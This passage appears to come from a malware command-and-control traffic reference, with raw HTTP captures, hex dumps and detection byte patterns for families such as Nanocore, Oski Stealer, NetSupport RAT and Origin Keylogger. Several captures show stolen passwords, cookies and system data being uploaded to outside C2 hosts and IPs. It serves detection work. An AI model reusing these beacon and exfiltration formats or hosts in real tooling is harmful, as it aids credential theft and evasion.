text](https://github.com/silence-is-best/c2db/blob/master/images/micropsia.png \"Micropsia\")\n\n#### MilkyBoy\n~~~\nPOST / HTTP/1.1\nCache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Adzq41ceq52e353512hSfj\nContent-Length: 45\nHost: qqwveqwevqwe.duckdns.org:10\n\nkey:Adz32151295uy129v5nqwrnvqwkjn5rv12n5vhSfj\n\nHTTP/1.0 200 OK\nContent-Type: text/html; charset=utf-8\nContent-Length: 8593928\nServer: Werkzeug/0.15.4 Python/2.7.6\nDate: Wed, 09 Oct 2019 22:09:57 GMT\n\nTVqQAAMAAAAEAAAA/\n\nPOST / HTTP/1.1\nHost: qqwveqwevqwe.duckdns.org:10\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.11.1\nkey: Adz32516047vhSfj\nfilename: 58759853857.zip\nContent-Length: 5334\nContent-Type: multipart/form-data; boundary=80790cc2554f462cb375dcc301f5c66a\n\n--80790cc2554f462cb375dcc301f5c66a\nContent-Disposition: form-data; name=\"payload\"; filename=\"payload\"\n\nPK........G.IO............\n...PASSWORDS/PK........G.IO+&.6v...........e.txt=.I.. .....Wx./X....%......g[VN6A...z~......x}....xH......*b....<@.W.P..X......,|*.]$..\n}..%.\t.C{....7.W......Bas.....PK........I.IO................sys.txt].Ok.@....|..S...&jho.B..........R.[.OK(..].K.2.7.73o~...'..6D.>q....U..u.. .W..x.0....=.T.#...<0\"....W.k.. .;..J1.q;X.{kz..S;_.f.t...D..Gh@......Q.v@G=}....m\"...............Yy..!1U...i.xe...B.T%..\t{5.....m...3.>....3.J..]Vh......&Y.@.8...T~1B!....l\nkk.:......m$....B.._.E........PK........G.IO................PASSWORDS/CBase/PK........G.IO................PASSWORDS/FBase/PK........G.IO................PASSWORDS/CBase/Google/PK........G.IO).L\n........#...PASSWORDS/CBase/Google/cookies.json....PK........G.IO\".......[...)...PASSWORDS/CBase/Google/loginpasswords.txt...=..r..\t-N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%....U.g...x...Z.sy...2......(X).r.......\n.d...V:....%...r.$.......d@|cS3...PK........G.IO.\"{.o...C...\"...PASSWORDS/CBase/Google/webdata.txt...=..r..\t-N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%......&..x...V.cy..2..K..sS.....2Ss@..\\>.P........b.0.PK........G.IO................PASSWORDS/FBase/Mozilla/PK........G.IOp.0.$.......$...PASSWORDS/FBase/Mozilla/cookies.json..Mk.@.....!......$......Vl$..~.......-..j-...R/s.y..}.....8..q.zm.[..n.~U..e).z..7.7..............\n...^z.6..t#....(@W.r43...U.iT.-.....%6.....1......}5......iG..Ut.i|\".I....$...~...Q.yr_.....tA.\"..\n@.p...',.!O!e..T.v.6..T.hEY*..H..Sq)....L......~...CD....E.0..Sa.T\t..`b.J*i...G...\"xpF.......PK........o.)M0..W............PASSWORDS/FBase\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/milkyboy-1.png \"Milkyboy 1\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/milkyboy-2.png \"Milkyboy 2\")\n\n#### MirageFox\n~~~\nPOST http://172.16.100.1/result%3Fhl%3Den%26meta%3Dghumeaylnlfdxfircvscxggbwkfnqdu HTTP/1.0\nAccept: *.*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\nProxy-Connection: Keep-Alive\nContent-Length: 528\nEncoding: gzip, deflate\nAccept-Language: en-us\nHost: 172.16.100.1\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/miragefox.png \"MirageFox\")\n\n#### Nanocore\n\nflag on \"38 00 00 00 17\" pattern\n~~~\n00000000 38 00 00 00 17 f5 4b 2c c3 65 ca 9f eb bc fd 67 8.....K, .e.....g\n00000010 ad 6d 0e c4 33 7d b6 40 17 17 97 a1 d9 7c 3c b3 .m..3}.@ .....|<.\n00000020 04 ea d0 16 f2 cf 3e 51 29 18 55 e5 1c 7a 6a 91 ......>Q ).U..zj.\n00000030 03 99 38 f7 ac 3b f7 89 85 2e c4 d8 ..8..;.. ....\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-38.png \"Nanocore 38\")\n\nflag on \"40 00 00 00 17\" pattern:\n~~~\n00000000 40 00 00 00 17 f5 4b 2c c3 65 ca 9f eb bc fd 67 @.....K, .e.....g\n00000010 ad 6d 0e c4 33 7d b6 40 17 17 97 a1 d9 7c 3c b3 .m..3}.@ .....|<.\n00000020 04 ea d0 16 87 30 8f fa 78 9d 2a 01 c2 51 ee 07 .....0.. x.*..Q..\n00000030 bd e7 23 95 3e ab a1 04 ca 56 b3 fb b7 9b b7 3a ..#.>... .V.....:\n00000040 13 e5 2b 52 ..+R\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-40.png \"Nanocore 40\")\n\nflag on \"50 00 00 00 82\" pattern:\n~~~\n00000000 50 00 00 00 82 c8 36 7a 87 1b 91 70 6b 20 7f 17 P.....6z ...pk ..\n00000010 ea 86 3a e9 07 fc 40 ae 0f ac bc f5 f2 6d f3 98 ..:...@. .....m..\n00000020 71 7a 0b 19 4c 8e 58 bb 6c 69 5a 99 55 4a 72 c6 qz..L.X. liZ.UJr.\n00000030 92 ed 39 fe 74 2a 9d b4 09 ca 5a 4a 83 dc 99 16 ..9.t*.. ..ZJ....\n00000040 0a ea 28 ad ba f6 87 d0 b7 4d 45 78 6a 71 84 19 ..(..... .MExjq..\n00000050 34 cc c6 79 4..y\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nanocore-50.png \"Nanocore 50\")\n\n#### NetSupport RAT\n~~~\nPOST http://179.43.159.246/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 179.43.159.246\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\nHTTP/1.1 200 OK\nServer: NetSupport Gateway/1.6 (Windows NT)\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 60\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=.g+$.{.. \\....W...bb...).w}..o..X..xf...\nPOST http://179.43.159.246/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 179.43.159.246\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u.2h.r..4.]..%y-.....=I...D3.W..i.7?....=@....F.f....&t.[..6ra..L.....?....>......5T.m.<..O....a.g.qwjW..I{~i...1......\\.bH8Z&8.|gY@:......7. .\\.(.K(...oC.x.m-.o.D.t....Lv...{.............=J.J...f.V=@.`t..i......\nPOST http://179.43.159.246/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 77\nHost: 179.43.159.246\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3.<(T{.E.....V....k.9|||$(m..$C.M..=I0`!.....^.....?sq. \n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/netsupport.png \"NetSupport RAT\")\n\n#### Netwire\nflag on \"41 00 00 00 99\" pattern in initial packet\n~~~\n00000000 41 00 00 00 99 80 3a e0 e8 5f d7 ea 8c af 76 cc A.....:. ._....v.\n00000010 c4 cc ad 5a 10 72 cc d0 5e 64 d8 50 80 fc b6 e6 ...Z.r.. ^d.P....\n00000020 54 25 bf e0 ea 7f 7b e4 ff 54 70 e8 eb c0 fa 80 T%....{. .Tp.....\n00000030 a0 a0 f3 a0 b0 0a 94 04 84 31 7c 3f e7 8c 90 c5 ........ .1|?....\n00000040 ce c4 11 97 d9 .....\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/netwire.png \"Netwire 40\")\n\n#### Neutrino\n~~~\nPOST /panel/52/tasks.php HTTP/1.0\nHost: slipcentral.com\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\nContent-type: application/x-www-form-urlencoded\nCookie: auth=bc00595440e801f8a5d2a2ad13b9791b\nContent-length: 180\n\n_wv=Y21kJjkwMDU5YzM3LTEzMjAtNDFhNC1iNThkLTJiNzVhOTg1MGQyZiZZV1J0YVc0Z09pQlZVMFZTTFZCRElEb2dWVk5GVWkxUVF3JTNEJTNEJldpbmRvd3MlMjA3JTIwKDMyLWJpdCkmMCZOJTJGQSY1LjEmMDguMTAuMjAxOSZOT05FHTTP/1.0 404 Not Found\nConnection: close\nX-Powered-By: PHP/5.6.40\nContent-Type: text/html; charset=UTF-8\nContent-Length: 1251\nDate: Tue, 08 Oct 2019 00:52:53 GMT\nServer: LiteSpeed\nVary: User-Agent\n\n\n\n404 Not Found\n\n

Not Found

\n

The requested URL /panel/52/tasks.php was not found on this server.

\n

Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.

\n\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/neutrino.png \"Neutrino\")\n\n#### Nukesped\n~~~\nPOST /list.php?v=1530 HTTP/1.1\nConnection: Keep-Alive\nContent-Type: multipart/form-data; boundary=FE4149CA-3412-4743-9789-F6C0D0371C4F\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nContent-Length: 385\nHost: lastedforcast.com\n\n\n\n--FE4149CA-3412-4743-9789-F6C0D0371C4F\nContent-Disposition: form-data; name=\"_media_1\"\n\n15868\n--FE4149CA-3412-4743-9789-F6C0D0371C4F\nContent-Disposition: form-data; name=\"_media_2\"\n\n16\n--FE4149CA-3412-4743-9789-F6C0D0371C4F\nContent-Disposition: form-data; name=\"file\"; filename=\"Sy2LbbDxqF1W.img\"\nContent-Type: octet-stream\n\n\n--FE4149CA-3412-4743-9789-F6C0D0371C4F--\n\nHTTP/1.1 200 OK\nDate: Fri, 12 Jun 2020 03:32:37 GMT\nServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31\nX-Powered-By: PHP/7.2.31\nContent-Length: 1\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\n\n0\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/nukesped.png \"Nukesped\")\n\n#### Orcus RAT\nMachine name is SNI\n~~~\n....j...f..].....*\".....L...^...xG.F..... ...../.5...\n.....\t.\n.2.8.......%..........\n...USER-PC.\n......................M..]......~$....q.....d..o..t{8Y..& V5.....Xj..[...d.'v...3Y..9...}.....................0...0..0.......GY.I..l.C.!d.((n0\n.\t*.H..\n.....0!1.0...U....OrcusServerCertificate0 .\n181004205345Z..20691004205345Z0!1.0...U....OrcusServerCertificate0..0\n.\t*.H..\n.........0..........C.}q.\n.%/.J..U..+U!...Zk.&5.\".\t.on......w..NA..n..... ...ZM!...g..]....]Z...,\n~h..?.......i'........u..... .r.|.o....2..A1KU.....0\n.\t*.H..\n...........}.#zu....*...eW.+..c8..qk^.8....F..S\"u.:..=...C .K.z....P...Y..M[..d.2p..U....O=.|*4-....S;.b...I......1t.~Z..e.ETxk...r(u_g........a...?.y$t..LR.:..>...3j..gT\t\t.....DJH..N.MJD.eb...I...}.V^5a...\\@.S..........4..u_...l$y....k*......|...D..Z\n.8S...i..z.9.&..5F.......A..V.c\\.{..I...1|.W..td?...Y.....\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/orcus.png \"Orcus RAT\")\n\n#### Origin Keylogger\n~~~\nFrom: sp@globalfinancel.com\nTo: new@globalfinancel.com\nDate: 17 Oct 2019 15:03:43 +0000\nSubject: admin/USER-PC Recovered Accounts\nContent-Type: text/html; charset=us-ascii\nContent-Transfer-Encoding: quoted-printable\n\nTime: 10/17/2019 15:03:33
UserName: admin
ComputerName: USE=\nR-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int=\nel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
IP: 18=\n5.117.118.92=0A
URL: https://www.facebook.com/
=0D=0AU=\nsername: honey@pot.com
=0D=0APassword: honeypass356
=0D=0AA=\npplication: Chrome
=0D=0A
=0D=0AURL: 192.168.1.1
=0D=0A=\nUsername: honey@pot.com
=0D=0APassword: honeypass356
=0D=0A=\nApplication: Outlook
=0D=0A
=0D=0A\n\nFrom: sp@globalfinancel.com\nTo: new@globalfinancel.com\nDate: 17 Oct 2019 15:03:43 +0000\nSubject: admin/USER-PC Recovered Cookies\nContent-Type: multipart/mixed;\n boundary=--boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244\n\n\n----boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244\nContent-Type: text/html; charset=us-ascii\nContent-Transfer-Encoding: quoted-printable\n\nTime: 10/17/2019 15:03:34
UserName: admin
ComputerName: USE=\nR-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Int=\nel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 4095.61 MB
IP: 18=\n5.117.118.92=0A
\n----boundary_0_33ca7fc1-78dd-4797-bb1b-819697f17244\nContent-Type: application/octet-stream; name=4dz3xb0p.hda.zip\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment\n\nUEsDBBQAAAgIAIRp/k5nVtI5VAoAAABwAAAjAAAANGR6M3hiMHAuaGRhL0Nocm9tZS9E\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/origin.png \"Origin Keylogger\")\n\n#### Oski Stealer\n~~~\nPOST /main.php HTTP/1.1\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\nContent-Length: 25\nHost: gewe.tech\nConnection: Keep-Alive\nCache-Control: no-cache\n\n--1BEF0A57BE110FD467A--\nHTTP/1.1 200 OK\nConnection: Keep-Alive\nX-Powered-By: PHP/7.2.26\nContent-Type: text/html; charset=UTF-8\nContent-Length: 102\nContent-Encoding: gzip\nVary: Accept-Encoding\nDate: Wed, 26 Feb 2020 11:23:13 GMT\nServer: LiteSpeed\n\n1;USERPROFILE\\Downloads;*.dat,*.key,*.txt;1;LOCALAPPDATA\\;*.dat,*.key,*.txt;1;APPDATA\\;*.dat,*.key,*.txt;1;USERPROFILE\\Documents;*.dat,*.key,*.txt;1;USERPROFILE\\Desktop;*.dat,*.key,*.txt;\n\nPOST / HTTP/1.1\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\nContent-Length: 60097\nHost: gewe.tech\nConnection: Keep-Alive\nCache-Control: no-cache\n\n--1BEF0A57BE110FD467A\nContent-Disposition: form-data; name=\"file\"; filename=\"_4052981232.zip\"\nContent-Type: zip\n\nPK.........ZZP..*.#...&...\"...autofill/Google Chrome_Default.txtUT\n..!UV^!UV^!UV^s.,*..K.M.tOL*.L....I...%..e....r..PK.........ZZP............-...autofill/Mozilla Firefox_qldyz51w.default.txtUT\n..!UV^!UV^!UV^..PK.........ZZP................cc/Google Chrome_Default.txtUT\n..!UV^!UV^!UV^..PK.........ZZP............!...cookies/Google Chrome_Default.txtUT\n..!UV^!UV^!UV^..PK.........ZZP..).........,...cookies/Mozilla Firefox_qldyz51w.default.txtUT\n..!UV^!UV^!UV^..KK.@...S.OI.{..YV.....5%.2.....vb...T..B.\\]8........y..{.7....67.....\\(..&C%:..F&.Ce.P5..k.#q.....b..?.`Y...kyW.Sv.B..Z.R=...[o..z^..uiR.-.eg..p.@g.....Y*..|...Q...cU..9R.J.\n)....r...!....\nY.<.4.Pg...5..4\"........@..]a.t.1.*.\t*D..v<....._/..._ .......r......L\"&.$C...x..PK.........ZZP8G..........\n...passwords.txtUT\n..!UV^ UV^ UV^...w.RpIMK,.)..\n.w..Rp..O.IUp.(..M......\nf....[.....%&.&..g.%....r........R+.\n.K@..\\....P....bcS3^..(......*S.r..Tk}..2sr...2.R..+`..d..PK.........ZZP.dwtv...T.......screenshot.jpgUT\n..&UV^&UV^&UV^..u\\TQ.5.. ..\"8 .. ... .CJJHJ..R\n.#...C.t.Jww..t.{...}?....}...9...93..k.u]{....,.....$.....\n......C....q........w0...X..a..=....S.....R...S>~BMJ............O... +..3.$(w.....E..M.........W...;....4...T\\.4\\..F...............B..q...=.A...*\n...-4t.[.....~.-\\t<*......b<..>.\t.~.Z...>.o......]L.G.D..t...L.\\.<.|../$$..edU..54.^j...653..t|............._.a...Q.1.bSR.....Y.E.%.e...U.....[Z.......GF........W.................\\........\\...[h.0..BA}.6...N.~...\n......|.@.B....K....7r..$....../\nye..]......?......`..._...D......s..7.....yFo.......S*\t....z..z.%^.~..8.... ....&T<.s.<..s.2.y}[..L.....i...4..h..+..\nb6.Z.....U,.z0Xn.........K8.]...m_4..@...R.....Z..W.N...k~....+.....|....; *...6W'.....1f.....Y....,.5>!...m...7\n.R'.f.E.`.M.,k..<\tua..W.D.+.Q.W .q......d...k.\n...system.txtUT\ni...PK.........ZZP................_1.zipUT\n..&UV^!UV^!UV^PK....................PK...........ZZP..*.#...&...\".\t....... .......autofill/Google Chrome_Default.txtUT...!UV^PK...........ZZP............-.\t....... ...t...autofill/Mozilla Firefox_qldyz51w.default.txtUT...!UV^PK...........ZZP..............\t....... .......cc/Google Chrome_Default.txtUT...!UV^PK...........ZZP............!.\t....... .......cookies/Google Chrome_Default.txtUT...!UV^PK...........ZZP..).........,.\t....... ...q...cookies/Mozilla Firefox_qldyz51w.default.txtUT...!UV^PK...........ZZP8G..........\n.\t....... .......passwords.txtUT...!UV^PK...........ZZP.dwtv...T.....\t....... .......screenshot.jpgUT...&UV^PK...........ZZP.pv.r... 2..\n.\t....... ...S...system.txtUT...&UV^PK...........ZZP..............\t....... ......._1.zipUT...&UV^PK......\t.\t.....I.....\n--1BEF0A57BE110FD467A--\n\nHTTP/1.1 200 OK\nConnection: Keep-Alive\nX-Powered-By: PHP/7.2.26\nContent-Type: text/html; charset=UTF-8\nContent-Length: 0\nDate: Wed, 26 Feb 2020 11:23:19 GMT\nServer: LiteSpeed\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/oski1.png \"Oski\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/oski2.png \"Oski\")\n\n#### Ostap\n~~~\nPOST /angola/mabutu.php?pi=29h&tan=cezar&z=662343339&n=0&u=20&an=9468863238 HTTP/1.1\nConnection: Keep-Alive\nContent-Type: text/plain; Charset=UTF-8\nAccept: */*\nAccept-Language: en-US\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\nContent-Length: 1034\nHost: 185.180.199.91\n\nMicrosoft Windows 7 Professional 6.1.7601*Locale:0409\nC:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sent64.jse\nUSER-PC*DELL*DELL*0\n\nSystem Idle Process*null\nSystem*null\nsmss.exe*null\ncsrss.exe*null\nwininit.exe*null\ncsrss.exe*null\nwinlogon.exe*null\nservices.exe*null\nlsass.exe*null\nlsm.exe*null\nsvchost.exe*null\nsvchost.exe*null\nsvchost.exe*null\nsvchost.exe*null\nsvchost.exe*null\nsvchost.exe*null\nsvchost.exe*null\nspoolsv.exe*null\nsvchost.exe*null\nsvchost.exe*null\nsvchost.exe*null\ndwm.exe*C:\\Windows\\system32\\Dwm.exe\nexplorer.exe*C:\\Windows\\Explorer.EXE\ntaskhost.exe*C:\\Windows\\system32\\taskhost.exe\nSearchIndexer.exe*null\nqemu-ga.exe*null\naudiodg.exe*null\nWmiPrvSE.exe*null\nSearchProtocolHost.exe*null\nwindanr.exe*C:\\Windows\\system32\\windanr.exe\nOSPPSVC.EXE*null\nwscript.exe*C:\\Windows\\system32\\wscript.exe\nwscript.exe*C:\\Windows\\system32\\wscript.exe\nSearchFilterHost.exe*null\nWINWORD.EXE*C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE\nWmiPrvSE.exe*null\n~~~\n~~~\nhttps://51.83.206.98/1/1.php?g=m4&b=4a01758c&c=ACCOUNTDOMAIN@@LARRY-ACCOUNTIN@@Larry@@*172.16.0.2%3A%3A%5B00000001%5D%20Intel%28R%29%20Ethernet%20Connection%20I217-LM&233137\n\nhttps://45.128.134.14/C821al/vc2Tmy.php?h=m2&j=4a01758c&l=ACCOUNTDOMAIN@@LARRY-ACCOUNTIN@@Larry@@*172.16.0.2%3A%3A%5B00000001%5D%20Intel%28R%29%20Ethernet%20Connection%20I217-LM&13742148\n~~~\n\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-1.png \"Ostap\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-2.png \"Ostap\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ostap-3.png \"Ostap\")\n\n#### Ousaban (banker)\n~~~\n#PRINCIPAL##Convite##ConvitRC#<#>Windows 10 Pro<#>DESKTOP-JGLLJLD<#>Nao<#>Windows Defender#SocketMain#<#>723442#UploadFile##RECEBENDO#<#>DESKTOP-JGLLJLD#ON-LINE##strPingOk##ON-LINE##strPingOk##ON-LINE##strPingOk##PLUGIN#<#>Nao#ON-LINE##strPingOk##COMPLETOU#<#>DESKTOP-JGLLJLD\n~~~\n\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ousaban.png \"Ousaban\")\n\n#### Parallax RAT\n~~~\n00000000 04 c7 86 72 fd 82 d3 50 88 03 b3 9f bc 7f b1 f3 ...r...P ........\n00000010 2f 44 27 83 80 9d ab d2 22 72 ff 33 88 8f 85 17 /D'..... \"r.3....\n00000020 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.\n00000030 ed 48 fd 08 40 83 c2 36 c8 82 e4 50 6a f0 4e 9f .H..@..6 ...Pj.N.\n00000040 8a 7f eb f3 42 44 64 83 c8 9d e1 d2 65 72 bc 33 ....BDd. ....er.3\n00000050 fe 8e aa 17 b4 af 88 1e 16 c9 25 88 29 a6 6b 7e ........ ..%.).k~\n00000060 26 95 4e d5 db 48 cc 08 3e d7 f8 0c 44 6e ff 59 &.N..H.. >...Dn.Y\n00000070 79 dc 64 86 8b c1 cd a6 64 c0 da 77 bf 95 77 dd y.d..... d..w..w.\n00000080 7c a0 d5 f0 71 34 56 b2 80 d8 1e b6 89 22 cf 8b |...q4V. .....\"..\n00000090 55 e4 05 4b 7b 6d 07 ef 93 6d f2 f3 4d ee ee 23 U..K{m.. .m..M..#\n000000A0 8f 26 b1 7d 98 34 ae e7 26 08 d4 e8 1d 28 21 2a .&.}.4.. &....(!*\n000000B0 35 3b c6 0c 01 01 6c ed 54 a4 a0 2f a2 ef e0 1d 5;....l. T../....\n000000C0 ce 34 b7 55 f8 2f fb 23 e9 50 cf e2 3a 35 50 bb .4.U./.# .P..:5P.\n000000D0 85 04 0a 91 c3 91 64 54 52 63 1f 8a 41 3a 25 d9 ......dT Rc..A:%.\n000000E0 bf da af 3b ea 73 0b 9c 1f 58 02 f2 97 83 10 7b ...;.s.. .X.....{\n000000F0 96 4a 7a 57 8a 38 54 76 c9 fa 6a 41 25 8a 10 37 .JzW.8Tv ..jA%..7\n00000100 03 52 d8 ca 85 2c 06 83 e3 ef 76 de 40 66 6c f0 .R...,.. ..v.@fl.\n00000110 a2 68 39 9a ef 9e 7d 93 56 99 e9 2a .h9...}. V..*\n 00000000 04 c7 86 72 d6 82 d3 50 e5 a4 56 9f bc 7f b1 f3 ...r...P ..V.....\n 00000010 2f 44 27 83 80 9d ab d2 aa 2b f8 35 a0 8e 85 17 /D'..... .+.5....\n 00000020 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.\n 00000030 ed 48 fd 08 .H..\n0000011C 04 c7 86 72 d7 82 d3 50 e5 a4 56 9f a0 89 20 f3 ...r...P ..V... .\n0000012C 2f 44 27 83 80 9d ab d2 22 72 ff 33 02 8e 85 17 /D'..... \"r.3....\n0000013C fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.\n0000014C ed 48 fd 08 fe 7c 59 c9 91 82 ba 50 4d f0 4b 9f .H...|Y. ...PM.K.\n0000015C cf 7f c5 f3 5d 44 46 83 f4 9d c4 d2 50 72 c5 33 ....]DF. ....Pr.3\n0000016C b4 8e c6 17 c7 af 95 1e 09 c9 01 88 1e a6 43 7e ........ ......C~\n0000017C 00 95 0c d5 9e 48 a1 08 7f d7 b1 0c 05 6e b9 59 .....H.. .....n.Y\n0000018C 2b dc 09 86 b8 c1 00 59 c7 3f ee 1e bc f1 7c aa +......Y .?....|.\n0000019C 21 80 87 d0 59 46 5c d4 e5 ab 92 20 19 b3 ae e7 !...YF\\. ... ....\n000001AC 75 e4 05 4b 7b 6d u..K{m\n 00000034 04 c7 86 72 d5 82 d3 50 23 f0 22 9f bc 7f b1 f3 ...r...P #.\".....\n 00000044 2f 44 27 83 80 9d ab d2 22 72 ff 33 a0 8e 85 17 /D'..... \"r.3....\n 00000054 fd af c9 1e 5e c9 68 88 70 a6 27 7e 6f 95 7b d5 ....^.h. p.'~o.{.\n 00000064 ed 48 fd 08 .H..\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parallax.png \"Parallax\")\n\n#### ParasiteHTTP Loader\n~~~\nPOST /index.php HTTP/1.1\nAccept: */*\nHost: 80.233.134.242\nContent-Type: application/x-www-form-urlencoded\nConnection: Close\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\nContent-Length: 280\nCache-Control: no-cache\n\nBF6472F6DC3=Pi5tSiBItP-2ZyuFJlr31Jp58O0HzR74v0b4l2HaoHH537FeTxgg-msYkTvX6SSJ8FswUtoTg4O86o2HyWec2zuU6VFzTwgaFYw_28nFRIqcJv8TqrV7SYgFKSpbqY8aZhEcHY982M_flvAHMCjsD8-fxezzV5BSBDBbfYb5WZvBrsbJVlPwXYFmETrm7CrWF5LwvEFhu1Ecp14ymv1xPoCG0vfqAv5tsUn0H7mA5R5g7HAo2c3_r9fuZUtw9CKD46G2JnBF-A==\n\nHTTP/1.1 200 OK\nDate: Tue, 28 May 2019 08:46:26 GMT\nServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.37\nX-Powered-By: PHP/5.6.37\nSet-Cookie: PHPSESSID=s3l4jdfsc8nkjghcevlshn3d67; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Length: 416\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n8jQG4riRhJFWMlJ9RTKeV7k45+I3REM8JjIIBZ2ttxzjDFxOX7VjxuypIrJn9cQ1ZMg6fvgWSSpto3sivUfvUCHWLzb2ljPhPugPTYb0KsgResnAIFl+aoqF5m9bCyBd6PMoRLdOdsuDW+E3wrb7ZNpApXlX2htDZRNhaqfST8eBE9Cvl7H0vyUzY+BfH5M4fvvt71DCRt2OP31tgu7aMMxM0mUWvBBZcNpeZzLRdMFd0Ea1u3oM+vLWrhFLYGuCWN6TPaqlEpw/9pgLUI8BhxUYFOJvyTRIFwXmlQPWMY6qg0/l+b5Ha+SYCnLtw8Uyqilil+OBM+KM5MT4C4l9vkXsv/ID9X8ZRr2l9cHzlW5J7sLVrGeH26KmBrjqBM3c4Ini4VTZZCr5KDrsRpi21NaheQLGLA==\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/parasitehttp.png \"ParasiteHTTP Loader\")\n\n#### Parasite Stealer aka Nexus\n~~~\nPOST /gate.php HTTP/1.1\nContent-Type: application/octet-stream;\nUser-Agent: Client\nHost: 193.168.3.101\nContent-Length: 1216583\nCache-Control: no-cache\n\n{846ee340-7039-11de-9d20-806e6f6e6963}~;^;Windows 7 Professional x64~;^;1.0~;^;0~;^;0~;^;0~;^;0~;^;0~;^;8~;^;PK.........q?P..&.?.......\t...about.logUT\n..m.4^m.4^m.4^.U]..@.}.\t..>j6...?.J.Z7K!....0,....au..;.6u.....s...\\?......J.CP...%....wz..........,#][F.p...]d...8X.`...[a... 